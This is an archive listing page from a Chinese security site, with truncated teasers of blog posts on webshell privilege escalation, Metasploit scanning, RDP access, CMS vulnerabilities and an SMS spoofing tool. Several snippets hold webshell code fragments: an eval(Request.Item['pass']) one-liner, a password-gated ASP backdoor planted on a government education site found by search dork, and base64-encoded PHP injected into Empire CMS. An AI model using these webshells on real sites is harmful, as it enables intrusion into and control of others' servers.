5月份所有文章 | CN-SEC 中文网

最全面的 webshell 提权资料之一

C:/Documents and Settings/All Users/「开始」菜单 / 程序 / 看这里能不能跳转，我们从这里可以获取好多有用的信息比如 Serv-U 的路径， ...

05月19日颓废's Blog1,178 views评论

阅读全文

Metasploit SMB 获取系统信息

Metasploit SMB 获取系统信息通过445端口，可以识别系统信息步骤： use auxiliary/scanner/smb/smb_version &n...

05月19日颓废's Blog602 views评论

阅读全文

解决3389开放却不能连接

为什么有时候3389开放却不能连接，有时候是因为防火墙，把终端端口转发到其他端口就可以连接，但是更多的转发后依然是连接不上，哪是因为管理员在TCP/IP里设置的端口限制。就算再...

05月19日颓废's Blog720 views评论

阅读全文

Metasploit端口扫描

kali-linux2.0下扫描端口 nmap命令 nmap -v -sV 192.168.2.107 -->可以完整扫描到端口、服务及版本利用metasploit的...

05月19日颓废's Blog477 views评论

阅读全文

Metasploit基础命令操作

kali-linux2.0的更新源文件：/etc/apt/sources.list PS：修改更新源是因为默认是官网的，国外的比较卡，所以可以调用国内的镜像 #中科大kali源 deb http://...

05月19日颓废's Blog452 views评论

阅读全文

致逝去的2016

2016年结束，迎来2017年。跑了很多地方，已经迷失了当年那种无忧无虑的时候，2016中国互联网安全大会回眼一看已失去了当年一样意气风发的熟人，换来的始终是新人，谁还记得2014...

05月19日颓废's Blog446 views评论

阅读全文

某政府教育网站0day

inurl:printpage.asp?ArticleID= 在后台版权信息栏里写入小马 if Request(“pass”)=”520″ then dim allen,creat,text,this...

05月19日颓废's Blog655 views评论

阅读全文

帝国cms 6.6漏洞

自定义页面-增加自定义页面-随便写个.php文件名，内容写：<script language="php">echo base64_decode("PD9waHAgQGV...

05月19日颓废's Blog772 views评论

阅读全文

颓废's Blog

W78cms网站管理系统漏洞

W78CMS企业网站管理系统是一套用的比较多的基于ASP程序的网站管理系统，在中国站长站的源程序下载量突破了一万一千次。前几天在tOOls.net看到有人公布了一个W78CMS企业...

05月19日1,196 views评论

阅读全文

sa权限获取webshell思路

echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe")...

05月19日颓废's Blog439 views评论

阅读全文

阿曼达cms漏洞

...

05月19日颓废's Blog601 views评论

阅读全文

颓废's Blog

短信伪装精灵,伪装短信生成器,可自定义收发任何短信内容

打码是因为不能带广告性质谢谢理解文件名稱：响应国家号召，禁止资源下载

05月19日2,393 views评论

阅读全文

最全面的 webshell 提权资料之一

Metasploit SMB 获取系统信息

解决3389开放却不能连接

Metasploit端口扫描

Metasploit基础命令操作

致逝去的2016

某政府教育网站0day

帝国cms 6.6漏洞

W78cms网站管理系统漏洞

sa权限获取webshell思路

阿曼达cms漏洞

短信伪装精灵,伪装短信生成器,可自定义收发任何短信内容

在线咨询

微信